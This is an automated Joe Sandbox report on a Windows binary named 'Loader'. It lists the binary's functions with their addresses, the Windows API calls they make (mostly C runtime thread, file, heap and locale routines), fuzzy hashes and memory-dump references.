Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 821b00ae3b832a86c62be92e4b0e852311c67e3452eb38d153a450283c23a76a
Instruction ID: 25ccebda5b08eada88fec2ba81f9517c9dc5dd391afad9aa4a149c06b4543b08
Opcode Fuzzy Hash: 821b00ae3b832a86c62be92e4b0e852311c67e3452eb38d153a450283c23a76a
Instruction Fuzzy Hash: 6B012DB3500259ABDF199FA1DD16FAE7BA4EF40364F00505CB901A6190EB728D52DAA0

Function 00EC49B3 Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ECB104: GetLastError.KERNEL32(00000000,?,00EC6BB6,00ECC132,?,?,00ECB000,00000001,00000364,?,00000005,000000FF,?,00EC495A,00EE56B0,0000000C), ref: 00ECB108
Part of subcall function 00ECB104: SetLastError.KERNEL32(00000000), ref: 00ECB1AA

CloseHandle.KERNEL32(?,?,?,00EC48AD,?,?,00EC4993,00000000), ref: 00EC49E4
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00EC48AD,?,?,00EC4993,00000000), ref: 00EC49FA
ExitThread.KERNEL32 ref: 00EC4A03

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: b377db6f15b61ed76591e2303796a2af4f8d431cff6fd83003478b7055c1345b
Instruction ID: 6125626c8c347f9092f6c7f7f7b2fd223f358779007a8d072b348fa1133a358b
Opcode Fuzzy Hash: b377db6f15b61ed76591e2303796a2af4f8d431cff6fd83003478b7055c1345b
Instruction Fuzzy Hash: A6F0BEB04046446BCB225B36AA59F5B7AA86F00324F086628F83BF65E0EB32DC46C654

Function 00EC4B24 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,00EC4BE6,00EC7849,?,?,00000002,C4C39003,Ix,00000002), ref: 00EC4B35
TerminateProcess.KERNEL32(00000000,?,00EC4BE6,00EC7849,?,?,00000002,C4C39003,Ix,00000002), ref: 00EC4B3C
ExitProcess.KERNEL32 ref: 00EC4B4E

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d2eef545fafcf139094ca0b5ac183bbc48ab5ec039fcfd46093a201a7f5b15b
Instruction ID: a6dceac8135c48c9f6fac1e1a3186f8678cbc79989132f26d2af449c5c7949ce
Opcode Fuzzy Hash: 3d2eef545fafcf139094ca0b5ac183bbc48ab5ec039fcfd46093a201a7f5b15b
Instruction Fuzzy Hash: 2DD017B1004148AFCB112FA2ED5DE483F29AB003517005028B9096A0A1EB32CD46DA44

Function 00EBB510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00EBB5BB

Strings

M*, xrefs: 00EBB5C8

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID: M*
API String ID: 2134207285-3724398180
Opcode ID: f241d0b9ac73692af1d0a465ad47ebc1d65208e1955f34a563396ea67358df8d
Instruction ID: 30e16029658ffd0252a59bc9fdf36dcc1366e2338f05c00e22626744d06900b2
Opcode Fuzzy Hash: f241d0b9ac73692af1d0a465ad47ebc1d65208e1955f34a563396ea67358df8d
Instruction Fuzzy Hash: E521B6B49042099FDB04EFA8D5517AFBBF1BF48304F00886DE445AB391E7749A45CF92

Function 00ED2D15 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED30BF: GetConsoleOutputCP.KERNEL32(C4C39003,00000000,00000000,?), ref: 00ED3122

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,S',00EC24F1,?,S'), ref: 00ED2E9A
GetLastError.KERNEL32(?,00EC2753,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED2EA4

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 3ac0ae0d009845d4bd4492d6391cfa0e153fb26aeff10bac1a3b704672bbc3ea
Instruction ID: 2e4468ed79b4b324c28a07400f682d00a7a8c3300a8a6684a39f7e5799a6ce82
Opcode Fuzzy Hash: 3ac0ae0d009845d4bd4492d6391cfa0e153fb26aeff10bac1a3b704672bbc3ea
Instruction Fuzzy Hash: C461D871900109AFDF11CFA8D984AEE7BB9EF29308F14114AF914B7351D332D902DB61

Function 00ED34EE Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00ED2E80,?,00EC2753,?,?,?,00000000), ref: 00ED358A
GetLastError.KERNEL32(?,00ED2E80,?,00EC2753,?,?,?,00000000,?,?,?,?,S',00EC24F1,?,S'), ref: 00ED35B0

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: d70db6efa135e28de5f0bfa6db45c43c6b72a8ecccf94a95fff486381328bd84
Instruction ID: 3589e93d48673cd5508f53745427a88d3e49f748713dff3f24041b07ad5169d9
Opcode Fuzzy Hash: d70db6efa135e28de5f0bfa6db45c43c6b72a8ecccf94a95fff486381328bd84
Instruction Fuzzy Hash: 88219130A002599FCF19CF29EC80AD9B7F9EB48305F2451AAE906E7311D730EE46CB65

Function 00ECC862 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00ECC751,00EE5BA0), ref: 00ECC8AE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00ECC751,00EE5BA0), ref: 00ECC8C0

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c807283a6298f1f61fad44346feaabe96f2b5bacd5c0f97f7e607993a5711b49
Instruction ID: e7569a7f781c867f170e8df503cc761e9af0e5724043d1564d1f866bde4f9933
Opcode Fuzzy Hash: c807283a6298f1f61fad44346feaabe96f2b5bacd5c0f97f7e607993a5711b49
Instruction Fuzzy Hash: 6F11A5725047554AC7384E3E9E88B33AA94A796338B34275DD0BEA69F1C272E887D604

Function 00EC4935 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00EE56B0,0000000C), ref: 00EC4948
ExitThread.KERNEL32 ref: 00EC494F

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: b702415c25dc3a0377c820853a3c5d4a8d4a40299e725f431bf2cf5fda37b80c
Instruction ID: 2837eb00fec184e5cb35f4180697ab33d911c72234d7fdf062a8460f8341b006
Opcode Fuzzy Hash: b702415c25dc3a0377c820853a3c5d4a8d4a40299e725f431bf2cf5fda37b80c
Instruction Fuzzy Hash: 7FF0A4B19402459FDB10AF70D946F6E7BB4EF41714F10115DF406BB291DB7159428FA1

Function 00EB1B70 Relevance: 3.0, APIs: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00EB1B98
GetModuleFileNameA.KERNEL32 ref: 00EB1BB8

Part of subcall function 00EB1860: CreateFileA.KERNELBASE ref: 00EB18E3

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FileModule$CreateHandleName
String ID:
API String ID: 2828212432-0
Opcode ID: 42fa8856a79663f6b487e1e83999c71a62fecba2d1e554eb6e8935b19372cfaa
Instruction ID: e4988239eb28574c75f310a941a559a48903c8d00b34924879bc70aeaefeaccb
Opcode Fuzzy Hash: 42fa8856a79663f6b487e1e83999c71a62fecba2d1e554eb6e8935b19372cfaa
Instruction Fuzzy Hash: 96F0BDB190420C8FC754EF79E9856DEBBF4AB14310F4145BDE4CDE7240EA7459888F86

Function 00ECAD27 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00ECF0A4,?,00000000,?,?,00ECED44,?,00000007,?,?,00ECF68A,?,?), ref: 00ECAD3D
GetLastError.KERNEL32(?,?,00ECF0A4,?,00000000,?,?,00ECED44,?,00000007,?,?,00ECF68A,?,?), ref: 00ECAD48

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5dc4de08e96f22dba3f3c2657bca9ccbb0e9cb520ebcc976d93960b7df3aa7ee
Instruction ID: 9c0efaefa46e05b4990f49e42506a103ceac7ca6801f9195da8212e9c7e2490f
Opcode Fuzzy Hash: 5dc4de08e96f22dba3f3c2657bca9ccbb0e9cb520ebcc976d93960b7df3aa7ee
Instruction Fuzzy Hash: 48E08671100208ABCB113BA5BD09F553B98AB4475DF184038F60DFE4B1EA3188518785

Function 00EB1EA0 Relevance: 1.8, APIs: 1, Instructions: 289COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00EB1ECA

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c780d40ad6557e97afc55967abf9022841c4badf784674081129c9bfb72eced3
Instruction ID: a06bea429c77b1ed9de9c5eed4c35e5a28148032f675585275f0f27a84cd38e6
Opcode Fuzzy Hash: c780d40ad6557e97afc55967abf9022841c4badf784674081129c9bfb72eced3
Instruction Fuzzy Hash: BBC12AB46083408FC704EF68D595AABBBF0AF99354F00992DF996DB3A2D735D904CB42

Function 00EBCE13 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3a01634ec45b837dc4a81c7e917b7076376c022749e8f93f7187d6b767d7fe
Instruction ID: c0f05474c2a5daddbd09f5f4aba9ed7dee46297d1de721b98255c0bb7fdfb8ab
Opcode Fuzzy Hash: fe3a01634ec45b837dc4a81c7e917b7076376c022749e8f93f7187d6b767d7fe
Instruction Fuzzy Hash: 21419A31A1410AEBCB14DF68C4908FEB7F9FF08304B60106AE542F7640E731E945CB90

Function 00ECBE0D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808eb93c0b1de5a631621ca2dfbdf026199f4534b1c4aae4253946ccbbf531dc
Instruction ID: c4c66dec2dd207dc5f112ddc9b2f85a2f26a7ebee968a79a19cb513703a3dbaf
Opcode Fuzzy Hash: 808eb93c0b1de5a631621ca2dfbdf026199f4534b1c4aae4253946ccbbf531dc
Instruction Fuzzy Hash: 6E01F93320061D9F9B159F6DED82E9733E6B780B64B245228FA15BF154DB32DC058750

Function 00ECAD61 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00ECCD3A,?,?,00ECCD3A,00000220,?,00000000,?), ref: 00ECAD93

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: efe3dd38897815259d9d7c7af8a35466914969b7e5f6e37a0ff35e079b838df1
Instruction ID: 899f14208bc35d94b55aaf203d968aab00c39d165189ffbfa5c8da3c4d2e96a3
Opcode Fuzzy Hash: efe3dd38897815259d9d7c7af8a35466914969b7e5f6e37a0ff35e079b838df1
Instruction Fuzzy Hash: 46E0A72110031C56962126B19E01F5A3E989B817AEF1D2179BC0AB59D0EE12CC0245D3

Non-executed Functions

Function 00EC8D90 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

"t, xrefs: 00EC91F1, 00EC8FE0
"t, xrefs: 00EC8DAE, 00EC8F46, 00EC9111, 00EC9166

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID: "t$"t
API String ID: 0-1451024413
Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
Instruction ID: b4c3dd1bf09823f08aeb12bbd8437f8bff72997974d1d928771d8ded679ca4a1
Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
Instruction Fuzzy Hash: DF023B71E012199BDB14CFA9DA84BAEBBF1FF48314F15826DD515B7341D732A902CB90

Function 00ED0062 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00ED016A
IsValidCodePage.KERNEL32(00000000), ref: 00ED01A8
IsValidLocale.KERNEL32(?,00000001), ref: 00ED01BB
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00ED0203
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00ED021E

Strings

`/, xrefs: 00ED0117

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: `/
API String ID: 415426439-3547518435
Opcode ID: e8cfa347b7e235f35747f3395c9ef94b7e51029c8ca17205d4f637319385787d
Instruction ID: 148a8f32efa4d5867bbaf36c30e5e925a99ca7aa07c952a1d3623a04d7f5ca7d
Opcode Fuzzy Hash: e8cfa347b7e235f35747f3395c9ef94b7e51029c8ca17205d4f637319385787d
Instruction Fuzzy Hash: 64517071A01209AFDB10DFA5DC45BBA77F8EF54714F08142AF905FB2A1E7B0DA068B61

Function 00ED6102 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00ED6319

Strings

1#IND, xrefs: 00ED6207
1#QNAN, xrefs: 00ED6215
1#SNAN, xrefs: 00ED620E
1#INF, xrefs: 00ED6238

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f78e12a77f18adc1b0bc59f29408e6ab1593ddc35768cfe4cf9860c38b839f01
Instruction ID: de672be145dba2af16b1d2db1ae2e77077469352afb17975043849c90ac21610
Opcode Fuzzy Hash: f78e12a77f18adc1b0bc59f29408e6ab1593ddc35768cfe4cf9860c38b839f01
Instruction Fuzzy Hash: F8D22771E082298FDB65CF28DD407EAB7B5EB44304F1451EAD84DB7240EB79AE868F41

Function 00ED07C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0860
GetLocaleInfoW.KERNEL32(?,20001004,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0889
GetACP.KERNEL32(?,?,00ED0198,?,00000000), ref: 00ED089E

Strings

OCP, xrefs: 00ED081B
ACP, xrefs: 00ED07E5

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
